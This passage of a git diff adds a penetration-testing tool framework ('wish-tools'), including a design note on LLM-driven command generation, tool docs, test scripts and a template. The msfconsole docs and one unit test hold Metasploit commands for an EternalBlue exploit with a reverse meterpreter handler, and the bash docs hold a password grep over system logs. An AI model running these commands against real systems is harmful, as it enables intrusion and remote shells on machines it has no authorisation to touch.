'*.conf' -type f 2>/dev/null", + "category": "file" + }, + "explanation": "Use bash for file system operations as no specialized tool needed", + "priority": 1 + } +] +``` + +Now process the user's request and select appropriate tools and capabilities. 
+``` + +## Implementation in Command Generation API + +### Modified Command Generation Workflow + +```python +# wish-command-generation-api integration +class ToolAwareCommandGenerator: + def __init__(self): + self.tool_registry = tool_registry + self.intent_mapper = IntentMapper() + + async def generate_commands(self, query: str, context: dict) -> List[dict]: + """Generate commands using tool framework.""" + + # 1. Get available tools + available_tools = self._get_available_tools() + + # 2. Create enhanced prompt with tool metadata + prompt = self._create_tool_aware_prompt(available_tools, query, context) + + # 3. Get LLM response with tool selections + llm_response = await self._call_llm(prompt) + + # 4. Parse and validate tool selections + tool_commands = self._parse_tool_selections(llm_response) + + # 5. Generate actual commands using tool framework + commands = [] + for tool_cmd in tool_commands: + try: + tool = self.tool_registry.get_tool(tool_cmd["tool"]) + command_input = tool.generate_command( + capability=tool_cmd["capability"], + parameters=tool_cmd["parameters"] + ) + + commands.append({ + "command": command_input.command, + "timeout_sec": command_input.timeout_sec, + "tool": tool_cmd["tool"], + "capability": tool_cmd["capability"], + "explanation": tool_cmd.get("explanation", ""), + "metadata": { + "tool_metadata": tool.metadata.dict(), + "parameters": tool_cmd["parameters"] + } + }) + except Exception as e: + # Fallback to bash if tool command generation fails + commands.append({ + "command": f"# Error generating command: {e}", + "timeout_sec": 300, + "tool": "bash", + "capability": "execute", + "explanation": f"Fallback due to error: {e}" + }) + + return commands + + def _get_available_tools(self) -> dict: + """Get metadata for all available tools.""" + tools_metadata = {} + for tool_metadata in self.tool_registry.list_tools(): + tools_metadata[tool_metadata.name] = { + "description": tool_metadata.description, + "category": tool_metadata.category, + 
"capabilities": [ + { + "name": cap.name, + "description": cap.description, + "parameters": cap.parameters, + "examples": cap.examples[:2] # Limit examples for prompt size + } + for cap in tool_metadata.capabilities + ], + "requirements": tool_metadata.requirements, + "tags": tool_metadata.tags + } + return tools_metadata + + def _create_tool_aware_prompt(self, tools: dict, query: str, context: dict) -> str: + """Create enhanced prompt with tool information.""" + # Build tool descriptions + tool_descriptions = [] + for tool_name, tool_info in tools.items(): + desc = f"### {tool_name} ({tool_info['category'].title()})\n" + desc += f"**Description:** {tool_info['description']}\n" + desc += "**Capabilities:**\n" + + for cap in tool_info['capabilities']: + desc += f"- {cap['name']}: {cap['description']}\n" + if cap['parameters']: + desc += f" - Parameters: {', '.join(cap['parameters'].keys())}\n" + + tool_descriptions.append(desc) + + # Build context information + context_info = [] + if context.get('target_host'): + context_info.append(f"Target Host: {context['target_host']}") + if context.get('current_directory'): + context_info.append(f"Current Directory: {context['current_directory']}") + + prompt = f"""You are a penetration testing assistant with access to specialized tools. + +## Available Tools + +{chr(10).join(tool_descriptions)} + +## Current Context +{chr(10).join(context_info) if context_info else "No specific context provided"} + +## Tool Selection Rules +1. Always prefer specialized tools over bash when available +2. Use bash only as fallback when no specialized tool exists +3. Consider tool availability and context + +## User Request +{query} + +Respond with a JSON array of tool commands using the format specified above. 
+
""" + return prompt +``` + +## Migration Strategy + +### Phase 1: Parallel Implementation +- Keep existing command generation working +- Add new tool-aware endpoint alongside existing one +- Test with subset of queries + +### Phase 2: Gradual Migration +- Route specific query types to tool-aware generator +- Fallback to legacy generator if tool-aware fails +- Monitor success rates and performance + +### Phase 3: Full Replacement +- Replace legacy generator with tool-aware version +- Remove fallback mechanisms +- Optimize for performance + +## Benefits + +1. **Better Tool Utilization**: LLM chooses optimal tools for each task +2. **Structured Output**: Tools provide metadata and structured results +3. **Safety**: Tool validation prevents dangerous commands +4. **Maintainability**: Adding new tools automatically improves LLM capabilities +5. **Fallback Robustness**: Bash ensures commands can always be generated + +## Testing Strategy + +### Unit Tests +```python +async def test_tool_selection(): + generator = ToolAwareCommandGenerator() + + # Test port scanning uses bash for nmap commands + commands = await generator.generate_commands( + "scan ports on 192.168.1.1", + {"target_host": "192.168.1.1"} + ) + + assert commands[0]["tool"] == "bash" + assert commands[0]["capability"] == "execute" + assert "nmap" in commands[0]["command"] + +async def test_msfconsole_selection(): + generator = ToolAwareCommandGenerator() + + commands = await generator.generate_commands( + "exploit target with EternalBlue", + {"target_host": "192.168.1.1"} + ) + + assert commands[0]["tool"] == "msfconsole" + assert commands[0]["capability"] == "exploit" +``` + +### Integration Tests +- Test with real LLM API calls +- Verify command generation for various scenarios +- Test fallback mechanisms +- Performance benchmarking + +This integration maintains backward compatibility while leveraging the full power of the tool framework. 
\ No newline at end of file diff --git a/wish-tools/docs/tools/bash.md b/wish-tools/docs/tools/bash.md new file mode 100644 index 0000000..2f8fc7b --- /dev/null +++ b/wish-tools/docs/tools/bash.md @@ -0,0 +1,99 @@ +# bash + +Fallback shell command execution when no specialized tool is available + +**Version:** 1.0.0 +**Author:** Wish Framework Team +**Category:** fallback +**Tags:** shell, fallback, general-purpose, universal + +## Requirements +- bash + +## Capabilities + +### execute +Execute any bash command (used when specialized tools are unavailable) + +**Parameters:** +- `command`: The bash command to execute +- `timeout`: Timeout in seconds (optional, default: 300) +- `category`: Command category hint (optional: network, file, process, system, web, text) + +**Examples:** +```bash +# Network enumeration fallback +``` +```bash +nc -zv 192.168.1.1 22-443 +``` +```bash +ping -c 4 8.8.8.8 +``` +```bash +# File operations fallback +``` +```bash +find /etc -name '*.conf' -type f +``` +```bash +grep -r 'password' /var/log/ +``` +```bash +# Process management fallback +``` +```bash +ps aux | grep nginx +``` +```bash +netstat -tulpn | grep :80 +``` +```bash +# System information fallback +``` +```bash +uname -a && cat /etc/os-release +``` +```bash +df -h && free -h +``` + +### script +Execute custom bash scripts for complex operations + +**Parameters:** +- `script`: The bash script content +- `args`: Script arguments (optional) + +**Examples:** +```bash +#!/bin/bash +# Custom enumeration script +for port in 22 80 443; do nc -zv $1 $port; done +``` +```bash +#!/bin/bash +# Log analysis script +grep 'ERROR' /var/log/*.log | tail -20 +``` + +### tool_combination +Combine multiple tools with pipes and logic when no single specialized tool exists + +**Parameters:** +- `command`: Complex command combining multiple tools +- `description`: Description of what the combined command does + +**Examples:** +```bash +# Network discovery + service detection +``` +```bash +nmap -sn 
192.168.1.0/24 | grep 'Nmap scan report' | awk '{print $5}' | xargs -I {} nmap -sV -p 22,80,443 {} +``` +```bash +# Log analysis with multiple filters +``` +```bash +cat /var/log/auth.log | grep 'Failed password' | awk '{print $11}' | sort | uniq -c | sort -nr +``` \ No newline at end of file diff --git a/wish-tools/docs/tools/index.md b/wish-tools/docs/tools/index.md new file mode 100644 index 0000000..65e78ed --- /dev/null +++ b/wish-tools/docs/tools/index.md @@ -0,0 +1,87 @@ +# Wish Tools Documentation + +This directory contains automatically generated documentation for all available tools +in the wish-tools framework. + +**Total Tools:** 2 +**Categories:** 2 + +## Tools by Category + +### Exploitation + +- **[msfconsole](msfconsole.md)** - Metasploit Framework penetration testing tool + +### Fallback + +- **[bash](bash.md)** - Fallback shell command execution when no specialized tool is available + +## Quick Reference + +| Tool | Category | Description | Requirements | +|------|----------|-------------|--------------| +| [bash](bash.md) | fallback | Fallback shell command execution when no specialized tool is available | bash | +| [msfconsole](msfconsole.md) | exploitation | Metasploit Framework penetration testing tool | metasploit-framework | + +## Usage Examples + +### Basic Tool Usage + +```python +from wish_tools.framework.registry import tool_registry +from wish_tools.framework.base import ToolContext, CommandInput + +# Get a tool +tool = tool_registry.get_tool('bash') + +# Create context +context = ToolContext( + working_directory='/tmp', + run_id='example' +) + +# Execute command +command = CommandInput(command='echo hello', timeout_sec=30) +result = await tool.execute(command, context) + +print(result.output) +``` + +### Generate Command from Capability + +```python +# Generate command using tool capabilities +tool = tool_registry.get_tool('bash') +command = tool.generate_command( + capability='execute', + parameters={ + 'command': 'nmap -sS -p 
22,80,443 192.168.1.0/24', + 'category': 'network' + } +) + +print(command.command) # nmap -sS -p 22,80,443 192.168.1.0/24 +``` + +### Tool Testing + +```python +from wish_tools.framework.testing import ToolTester, TestCase + +# Create tester +tool = tool_registry.get_tool('bash') +tester = ToolTester(tool) + +# Run availability test +result = await tester.test_availability() +print(f'Tool available: {result.passed}') + +# Generate test report +results = await tester.run_test_suite(test_cases) +report = tester.generate_report(results) +print(report) +``` + +--- + +*Documentation generated automatically by wish-tools framework* \ No newline at end of file diff --git a/wish-tools/docs/tools/msfconsole.md b/wish-tools/docs/tools/msfconsole.md new file mode 100644 index 0000000..7570240 --- /dev/null +++ b/wish-tools/docs/tools/msfconsole.md @@ -0,0 +1,82 @@ +# msfconsole + +Metasploit Framework penetration testing tool + +**Version:** 1.0.0 +**Author:** Wish Framework Team +**Category:** exploitation +**Tags:** exploitation, pentesting, vulnerability, msf, metasploit + +## Requirements +- metasploit-framework + +## Capabilities + +### exploit +Run an exploit module against target(s) + +**Parameters:** +- `module`: The exploit module path (e.g., exploit/windows/smb/ms17_010_eternalblue) +- `rhosts`: Target host(s) - IP address or range +- `rport`: Target port (optional, module default used if not specified) +- `payload`: Payload to use (optional, module default used if not specified) +- `lhost`: Local host for reverse connection (required for reverse payloads) +- `lport`: Local port for reverse connection (optional, default: 4444) +- `options`: Additional module options as key-value pairs (optional) + +**Examples:** +```bash +use exploit/windows/smb/ms17_010_eternalblue; set RHOSTS 192.168.1.100; set LHOST 192.168.1.10; exploit +``` +```bash +use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.10; exploit +``` + +### auxiliary 
+Run an auxiliary module (scanners, fuzzers, etc.) + +**Parameters:** +- `module`: The auxiliary module path (e.g., auxiliary/scanner/smb/smb_version) +- `rhosts`: Target host(s) - IP address or range +- `rport`: Target port (optional) +- `options`: Additional module options as key-value pairs (optional) + +**Examples:** +```bash +use auxiliary/scanner/smb/smb_version; set RHOSTS 192.168.1.0/24; run +``` +```bash +use auxiliary/scanner/portscan/tcp; set RHOSTS 192.168.1.100; set PORTS 1-1000; run +``` + +### search +Search for modules by name, platform, or CVE + +**Parameters:** +- `query`: Search query (module name, CVE, platform, etc.) +- `type`: Module type filter (optional: exploit, auxiliary, post, payload) + +**Examples:** +```bash +search type:exploit platform:windows smb +``` +```bash +search cve:2017-0144 +``` +```bash +search apache struts +``` + +### info +Get detailed information about a module + +**Parameters:** +- `module`: Full module path to get information about + +**Examples:** +```bash +info exploit/windows/smb/ms17_010_eternalblue +``` +```bash +info auxiliary/scanner/smb/smb_version +``` \ No newline at end of file diff --git a/wish-tools/pyproject.toml b/wish-tools/pyproject.toml index d09b685..6dd30b0 100644 --- a/wish-tools/pyproject.toml +++ b/wish-tools/pyproject.toml @@ -21,6 +21,7 @@ dev-dependencies = [ "pytest>=8.3.4", "ruff>=0.9.8", "graphviz>=0.20.1", + "pre-commit>=3.6.0", ] [tool.pdm.build] diff --git a/wish-tools/scripts/generate_tool_docs.py b/wish-tools/scripts/generate_tool_docs.py new file mode 100644 index 0000000..14574e3 --- /dev/null +++ b/wish-tools/scripts/generate_tool_docs.py @@ -0,0 +1,282 @@ +#!/usr/bin/env python3 +""" +Tool documentation generator for wish-tools. + +This script automatically generates documentation for all available tools +in the wish-tools framework. 
+""" + +import argparse +import sys +from pathlib import Path + +# Add src to path for imports +sys.path.insert(0, str(Path(__file__).parent.parent / "src")) + +from wish_tools.framework.registry import tool_registry + + +def generate_individual_docs(output_dir: Path): + """Generate individual documentation files for each tool.""" + output_dir.mkdir(parents=True, exist_ok=True) + + tools = tool_registry.list_tools() + print(f"Generating documentation for {len(tools)} tools...") + + for tool_metadata in tools: + try: + # Get tool instance + tool = tool_registry.get_tool(tool_metadata.name) + + # Generate documentation + docs = tool.get_documentation() + + # Write to file + doc_file = output_dir / f"{tool_metadata.name}.md" + with open(doc_file, "w") as f: + f.write(docs) + + print(f"Generated: {doc_file}") + + except Exception as e: + print(f"Error generating docs for {tool_metadata.name}: {e}") + + +def generate_index_docs(output_dir: Path): + """Generate an index file listing all available tools.""" + index_file = output_dir / "index.md" + + tools = tool_registry.list_tools() + + # Group tools by category + categories = {} + for tool in tools: + if tool.category not in categories: + categories[tool.category] = [] + categories[tool.category].append(tool) + + # Generate index content + content = [ + "# Wish Tools Documentation", + "", + "This directory contains automatically generated documentation for all available tools", + "in the wish-tools framework.", + "", + f"**Total Tools:** {len(tools)}", + f"**Categories:** {len(categories)}", + "", + "## Tools by Category", + "", + ] + + for category, category_tools in sorted(categories.items()): + content.append(f"### {category.title()}") + content.append("") + + for tool in sorted(category_tools, key=lambda t: t.name): + content.append(f"- **[{tool.name}]({tool.name}.md)** - {tool.description}") + + content.append("") + + # Add quick reference + content.extend( + [ + "## Quick Reference", + "", + "| Tool | Category | 
Description | Requirements |", + "|------|----------|-------------|--------------|", + ] + ) + + for tool in sorted(tools, key=lambda t: t.name): + requirements = ", ".join(tool.requirements) if tool.requirements else "None" + content.append(f"| [{tool.name}]({tool.name}.md) | {tool.category} | {tool.description} | {requirements} |") + + content.extend( + [ + "", + "## Usage Examples", + "", + "### Basic Tool Usage", + "", + "```python", + "from wish_tools.framework.registry import tool_registry", + "from wish_tools.framework.base import ToolContext, CommandInput", + "", + "# Get a tool", + "tool = tool_registry.get_tool('bash')", + "", + "# Create context", + "context = ToolContext(", + " working_directory='/tmp',", + " run_id='example'", + ")", + "", + "# Execute command", + "command = CommandInput(command='echo hello', timeout_sec=30)", + "result = await tool.execute(command, context)", + "", + "print(result.output)", + "```", + "", + "### Generate Command from Capability", + "", + "```python", + "# Generate command using tool capabilities", + "tool = tool_registry.get_tool('bash')", + "command = tool.generate_command(", + " capability='execute',", + " parameters={", + " 'command': 'nmap -sS -p 22,80,443 192.168.1.0/24',", + " 'category': 'network'", + " }", + ")", + "", + "print(command.command) # nmap -sS -p 22,80,443 192.168.1.0/24", + "```", + "", + "### Tool Testing", + "", + "```python", + "from wish_tools.framework.testing import ToolTester, TestCase", + "", + "# Create tester", + "tool = tool_registry.get_tool('bash')", + "tester = ToolTester(tool)", + "", + "# Run availability test", + "result = await tester.test_availability()", + "print(f'Tool available: {result.passed}')", + "", + "# Generate test report", + "results = await tester.run_test_suite(test_cases)", + "report = tester.generate_report(results)", + "print(report)", + "```", + "", + "---", + "", + "*Documentation generated automatically by wish-tools framework*", + ] + ) + + with 
open(index_file, "w") as f: + f.write("\n".join(content)) + + print(f"Generated index: {index_file}") + + +def generate_capability_matrix(output_dir: Path): + """Generate a capability matrix showing what each tool can do.""" + matrix_file = output_dir / "capability-matrix.md" + + tools = tool_registry.list_tools() + + # Collect all unique capabilities + all_capabilities = set() + tool_capabilities = {} + + for tool in tools: + capabilities = [cap.name for cap in tool.capabilities] + tool_capabilities[tool.name] = capabilities + all_capabilities.update(capabilities) + + all_capabilities = sorted(all_capabilities) + + content = [ + "# Tool Capability Matrix", + "", + "This matrix shows which capabilities are available for each tool.", + "", + "| Tool | " + " | ".join(all_capabilities) + " |", + "|------|" + "|".join("---" for _ in all_capabilities) + "|", + ] + + for tool in sorted(tools, key=lambda t: t.name): + row = [f"**{tool.name}**"] + for capability in all_capabilities: + if capability in tool_capabilities[tool.name]: + row.append("✅") + else: + row.append("❌") + content.append("| " + " | ".join(row) + " |") + + content.extend( + [ + "", + "## Legend", + "", + "- ✅ = Capability available", + "- ❌ = Capability not available", + "", + "## Capability Descriptions", + "", + ] + ) + + # Add capability descriptions + capability_descriptions = {} + for tool in tools: + for cap in tool.capabilities: + if cap.name not in capability_descriptions: + capability_descriptions[cap.name] = cap.description + + for capability in sorted(capability_descriptions.keys()): + content.append(f"- **{capability}**: {capability_descriptions[capability]}") + + with open(matrix_file, "w") as f: + f.write("\n".join(content)) + + print(f"Generated capability matrix: {matrix_file}") + + +def main(): + """Main entry point.""" + parser = argparse.ArgumentParser(description="Generate documentation for wish-tools") + parser.add_argument( + "--output-dir", + type=Path, + 
default=Path(__file__).parent.parent / "docs" / "tools", + help="Output directory for documentation", + ) + parser.add_argument("--individual", action="store_true", help="Generate individual tool documentation files") + parser.add_argument("--index", action="store_true", help="Generate index documentation") + # Capability matrix removed - misleading about bash capabilities + # parser.add_argument( + # "--matrix", + # action="store_true", + # help="Generate capability matrix" + # ) + + args = parser.parse_args() + + # If no specific options, generate all available + if not any([args.individual, args.index]): + args.individual = True + args.index = True + + print(f"Generating documentation in: {args.output_dir}") + + # Auto-discover tools + try: + tool_registry.auto_discover_tools("wish_tools.tools") + print(f"Discovered {len(tool_registry.get_tool_names())} tools") + except Exception as e: + print(f"Warning: Tool auto-discovery failed: {e}") + + # Generate documentation + if args.individual: + generate_individual_docs(args.output_dir) + + if args.index: + generate_index_docs(args.output_dir) + + # Capability matrix removed - it was misleading about bash capabilities + # if args.matrix: + # generate_capability_matrix(args.output_dir) + + print("Documentation generation complete!") + + +if __name__ == "__main__": + main() diff --git a/wish-tools/scripts/test_tools.py b/wish-tools/scripts/test_tools.py new file mode 100644 index 0000000..462264f --- /dev/null +++ b/wish-tools/scripts/test_tools.py @@ -0,0 +1,280 @@ +#!/usr/bin/env python3 +""" +Tool testing script for wish-tools. + +This script runs comprehensive tests on all available tools +and generates detailed reports about their functionality. 
+""" + +import argparse +import asyncio +import sys +from pathlib import Path +from typing import Any, Dict, List + +# Add src to path for imports +sys.path.insert(0, str(Path(__file__).parent.parent / "src")) + +from wish_tools.framework.registry import tool_registry +from wish_tools.framework.testing import ( + ExitCodeValidator, + OutputValidator, + PerformanceValidator, + TestCase, + ToolTester, +) + + +def create_bash_test_suite() -> List[TestCase]: + """Create test suite for BashTool.""" + return [ + TestCase( + name="simple_echo", + description="Test simple echo command", + capability="execute", + parameters={"command": "echo 'Hello World'"}, + expected_success=True, + validators=[ + OutputValidator(contains="Hello World"), + ExitCodeValidator(expected=0), + PerformanceValidator(max_time=5.0), + ], + ), + TestCase( + name="file_listing", + description="Test file listing command", + capability="execute", + parameters={"command": "ls -la"}, + expected_success=True, + validators=[ExitCodeValidator(expected=0), PerformanceValidator(max_time=10.0)], + ), + TestCase( + name="invalid_command", + description="Test handling of invalid command", + capability="execute", + parameters={"command": "nonexistentcommand12345"}, + expected_success=False, + validators=[ + ExitCodeValidator(expected=127) # Command not found + ], + ), + TestCase( + name="script_execution", + description="Test script execution capability", + capability="script", + parameters={"script": "#!/bin/bash\necho 'Script output'\ndate +%Y", "args": ""}, + expected_success=True, + validators=[OutputValidator(contains="Script output"), ExitCodeValidator(expected=0)], + ), + ] + + +def create_msfconsole_test_suite() -> List[TestCase]: + """Create test suite for MsfconsoleTool.""" + + def skip_if_no_msfconsole(): + """Skip test if msfconsole is not available.""" + import subprocess + + try: + subprocess.run(["msfconsole", "-v"], capture_output=True, timeout=10) + return False + except (FileNotFoundError, 
subprocess.TimeoutExpired): + return True + + return [ + TestCase( + name="module_search", + description="Test module search functionality", + capability="search", + parameters={"query": "smb", "type": "auxiliary"}, + expected_success=True, + validators=[OutputValidator(contains="auxiliary"), ExitCodeValidator(expected=0)], + skip_if=skip_if_no_msfconsole, + ), + TestCase( + name="module_info", + description="Test module info retrieval", + capability="info", + parameters={"module": "auxiliary/scanner/smb/smb_version"}, + expected_success=True, + validators=[OutputValidator(contains="Name:"), ExitCodeValidator(expected=0)], + skip_if=skip_if_no_msfconsole, + ), + ] + + +# NmapTool removed - using bash for nmap commands instead + + +async def test_single_tool(tool_name: str, test_cases: List[TestCase]) -> Dict[str, Any]: + """Test a single tool with the provided test cases.""" + print(f"\n{'=' * 60}") + print(f"Testing tool: {tool_name}") + print(f"{'=' * 60}") + + try: + tool = tool_registry.get_tool(tool_name) + tester = ToolTester(tool) + + # Run test suite + results = await tester.run_test_suite(test_cases) + + # Generate and print report + report = tester.generate_report(results) + print(report) + + # Return summary + total_tests = len(results) + passed_tests = sum(1 for r in results if r.passed) + + return { + "tool_name": tool_name, + "total_tests": total_tests, + "passed_tests": passed_tests, + "success_rate": passed_tests / total_tests if total_tests > 0 else 0, + "results": results, + } + + except Exception as e: + print(f"Error testing {tool_name}: {e}") + return {"tool_name": tool_name, "total_tests": 0, "passed_tests": 0, "success_rate": 0, "error": str(e)} + + +async def test_all_tools() -> List[Dict[str, Any]]: + """Test all available tools.""" + # Define test suites for each tool + test_suites = {"bash": create_bash_test_suite(), "msfconsole": create_msfconsole_test_suite()} + + results = [] + + for tool_name, test_cases in test_suites.items(): + if 
tool_registry.has_tool(tool_name): + result = await test_single_tool(tool_name, test_cases) + results.append(result) + else: + print(f"\nTool {tool_name} not available, skipping tests") + results.append( + { + "tool_name": tool_name, + "total_tests": 0, + "passed_tests": 0, + "success_rate": 0, + "error": "Tool not available", + } + ) + + return results + + +def print_summary(results: List[Dict[str, Any]]): + """Print a summary of all test results.""" + print(f"\n{'=' * 60}") + print("TEST SUMMARY") + print(f"{'=' * 60}") + + total_tools = len(results) + total_tests = sum(r["total_tests"] for r in results) + total_passed = sum(r["passed_tests"] for r in results) + + print(f"Tools tested: {total_tools}") + print(f"Total tests: {total_tests}") + print(f"Tests passed: {total_passed}") + print(f"Overall success rate: {total_passed / total_tests * 100:.1f}%" if total_tests > 0 else "N/A") + print() + + # Per-tool summary + print("Per-tool results:") + print("-" * 60) + print(f"{'Tool':<15} {'Tests':<8} {'Passed':<8} {'Success Rate':<12} {'Status'}") + print("-" * 60) + + for result in results: + status = "✅ PASS" if result["success_rate"] == 1.0 and result["total_tests"] > 0 else "❌ FAIL" + if result["total_tests"] == 0: + status = "⚠️ SKIP" + + success_rate = f"{result['success_rate'] * 100:.1f}%" if result["total_tests"] > 0 else "N/A" + + print( + f"{result['tool_name']:<15} {result['total_tests']:<8} " + f"{result['passed_tests']:<8} {success_rate:<12} {status}" + ) + + +async def main(): + """Main entry point.""" + parser = argparse.ArgumentParser(description="Test wish-tools framework") + parser.add_argument("--tool", type=str, help="Test only the specified tool") + parser.add_argument( + "--output-dir", + type=Path, + default=Path(__file__).parent.parent / "test-reports", + help="Directory to save test reports", + ) + parser.add_argument("--save-reports", action="store_true", help="Save detailed test reports to files") + + args = parser.parse_args() + + 
print("Wish Tools Testing Framework") + print("=" * 60) + + # Auto-discover tools + try: + tool_registry.auto_discover_tools("wish_tools.tools") + discovered_tools = tool_registry.get_tool_names() + print(f"Discovered tools: {', '.join(discovered_tools)}") + except Exception as e: + print(f"Warning: Tool auto-discovery failed: {e}") + discovered_tools = [] + + if not discovered_tools: + print("No tools discovered. Exiting.") + return + + # Run tests + if args.tool: + if not tool_registry.has_tool(args.tool): + print(f"Tool '{args.tool}' not found") + return + + # Test single tool + test_suites = {"bash": create_bash_test_suite(), "msfconsole": create_msfconsole_test_suite()} + + if args.tool in test_suites: + results = [await test_single_tool(args.tool, test_suites[args.tool])] + else: + print(f"No test suite defined for tool '{args.tool}'") + return + else: + # Test all tools + results = await test_all_tools() + + # Print summary + print_summary(results) + + # Save reports if requested + if args.save_reports: + args.output_dir.mkdir(parents=True, exist_ok=True) + + for result in results: + if "results" in result: + tool_name = result["tool_name"] + report_file = args.output_dir / f"{tool_name}-test-report.md" + + # Get tool and regenerate detailed report + try: + tool = tool_registry.get_tool(tool_name) + tester = ToolTester(tool) + detailed_report = tester.generate_report(result["results"]) + + with open(report_file, "w") as f: + f.write(detailed_report) + + print(f"Saved detailed report: {report_file}") + except Exception as e: + print(f"Error saving report for {tool_name}: {e}") + + +if __name__ == "__main__": + asyncio.run(main()) diff --git a/wish-tools/scripts/tool_template.py b/wish-tools/scripts/tool_template.py new file mode 100644 index 0000000..baccb1f --- /dev/null +++ b/wish-tools/scripts/tool_template.py @@ -0,0 +1,136 @@ +""" +TOOL_NAME tool implementation for wish framework. 
+ +TODO: Replace TOOL_NAME with your actual tool name and implement the required methods. +""" + +import asyncio +import subprocess +import time +from typing import Any, Dict, Optional + +from wish_tools.framework.base import BaseTool, CommandInput, ToolCapability, ToolContext, ToolMetadata, ToolResult + + +class TOOL_NAMETool(BaseTool): + """TODO: Add tool description.""" + + def _build_metadata(self) -> ToolMetadata: + return ToolMetadata( + name="TOOL_NAME", + version="1.0.0", + description="TODO: Add tool description", + author="Your Name", + category="TODO: Choose category (network/exploitation/web/file/etc)", + capabilities=[ + ToolCapability( + name="TODO_capability_name", + description="TODO: Describe what this capability does", + parameters={ + "TODO_param": "TODO: Parameter description", + "timeout": "Timeout in seconds (optional)", + }, + examples=["TODO: Add example commands"], + ) + ], + requirements=["TOOL_NAME"], # System requirements + tags=["TODO", "add", "relevant", "tags"], + ) + + async def validate_availability(self) -> tuple[bool, Optional[str]]: + """Check if TOOL_NAME is available on the system.""" + try: + result = subprocess.run( + ["TOOL_NAME", "--version"], # Adjust command as needed + capture_output=True, + text=True, + timeout=5, + ) + if result.returncode == 0: + return True, None + else: + return False, "TOOL_NAME returned non-zero exit code" + except FileNotFoundError: + return False, "TOOL_NAME not found. 
Please install TOOL_NAME" + except subprocess.TimeoutExpired: + return False, "TOOL_NAME version check timed out" + except Exception as e: + return False, f"Error checking TOOL_NAME availability: {str(e)}" + + async def execute(self, command: CommandInput, context: ToolContext, **kwargs) -> ToolResult: + """Execute TOOL_NAME command.""" + start_time = time.time() + + try: + # TODO: Implement tool execution + # Example implementation: + + process = await asyncio.create_subprocess_shell( + command.command, + stdout=asyncio.subprocess.PIPE, + stderr=asyncio.subprocess.PIPE, + cwd=context.working_directory, + ) + + timeout = command.timeout_sec or context.timeout_override or 300 + + try: + stdout, stderr = await asyncio.wait_for(process.communicate(), timeout=timeout) + except asyncio.TimeoutError: + process.kill() + await process.wait() + return ToolResult( + success=False, + output="", + error="Command timed out", + exit_code=124, + execution_time=timeout, + metadata={"timeout": True}, + ) + + output = stdout.decode("utf-8", errors="replace") if stdout else "" + error = stderr.decode("utf-8", errors="replace") if stderr else "" + + return ToolResult( + success=process.returncode == 0, + output=output, + error=error if error else None, + exit_code=process.returncode or 0, + execution_time=time.time() - start_time, + metadata={"command": command.command, "working_directory": context.working_directory}, + ) + + except Exception as e: + return ToolResult( + success=False, + output="", + error=f"TOOL_NAME execution error: {str(e)}", + exit_code=-1, + execution_time=time.time() - start_time, + metadata={"error_type": type(e).__name__}, + ) + + def generate_command( + self, capability: str, parameters: Dict[str, Any], context: Optional[ToolContext] = None + ) -> CommandInput: + """Generate TOOL_NAME command for the specified capability.""" + + if capability == "TODO_capability_name": + # TODO: Implement command generation + command = f"TOOL_NAME 
{parameters.get('TODO_param', '')}" + + return CommandInput(command=command, timeout_sec=parameters.get("timeout", 300)) + else: + raise ValueError(f"Unknown capability: {capability}") + + def validate_command(self, command: CommandInput) -> tuple[bool, Optional[str]]: + """Validate TOOL_NAME command for safety.""" + # TODO: Add tool-specific validation + cmd = command.command.strip() + + if not cmd: + return False, "Command cannot be empty" + + # Add any dangerous pattern checks here + + return True, None diff --git a/wish-tools/scripts/update_graph_visualization.py b/wish-tools/scripts/update_graph_visualization.py index e01fb0b..67f833d 100644 --- a/wish-tools/scripts/update_graph_visualization.py +++ b/wish-tools/scripts/update_graph_visualization.py @@ -132,7 +132,7 @@ def extract_graph_config(graph: StateGraph) -> Dict: "entry_point": entry_point, "finish_points": finish_points, "edges": edges, - "conditional_edges": conditional_edges + "conditional_edges": conditional_edges, } @@ -143,7 +143,7 @@ def generate_graph_visualization(): "tool_step_trace": { "module_path": "wish_tools.tool_step_trace", "filename": "tool_step_trace_graph.svg", - "title": "Tool Step Trace Graph" + "title": "Tool Step Trace Graph", } } @@ -238,6 +238,7 @@ def update_readme(graph_title: str, svg_filename: str): else: # Add this graph to the existing section import re + section_pattern = re.compile(f"{graph_section_title}.*?(?=^#|$)", re.DOTALL | re.MULTILINE) section_match = section_pattern.search(content) diff --git a/wish-tools/src/wish_tools/__init__.py b/wish-tools/src/wish_tools/__init__.py new file mode 100644 index 0000000..08afb25 --- /dev/null +++ b/wish-tools/src/wish_tools/__init__.py @@ -0,0 +1,41 @@ +""" +Wish Tools - Extensible tool framework for penetration testing workflows. + +This package provides a unified interface for various penetration testing tools, +allowing them to be used seamlessly within the wish framework. 
+ +## Quick Start + +```python +from wish_tools.framework.registry import tool_registry +from wish_tools.framework.base import ToolContext + +# Get available tools +tools = tool_registry.list_tools() + +# Use a tool +tool = tool_registry.get_tool("bash") +context = ToolContext(working_directory="/tmp", run_id="test") +result = await tool.execute(command, context) +``` + +## Legacy Tools + +The following legacy tools are available for backward compatibility: +- tool_step_trace: Step tracing functionality +- to_base64: Base64 encoding utility + +These will be migrated to the new framework interface in future versions. +""" + +from wish_tools.framework.registry import tool_registry + +__version__ = "1.0.0" +__all__ = ["tool_registry"] + +# Auto-discover and register tools +try: + tool_registry.auto_discover_tools("wish_tools.tools") +except Exception: + # Graceful degradation if auto-discovery fails + pass diff --git a/wish-tools/src/wish_tools/framework/__init__.py b/wish-tools/src/wish_tools/framework/__init__.py new file mode 100644 index 0000000..b6ccf58 --- /dev/null +++ b/wish-tools/src/wish_tools/framework/__init__.py @@ -0,0 +1,24 @@ +""" +Wish Tools Framework - Core framework components for tool abstraction. + +This module provides the base classes and utilities for implementing +tools in the wish framework. 
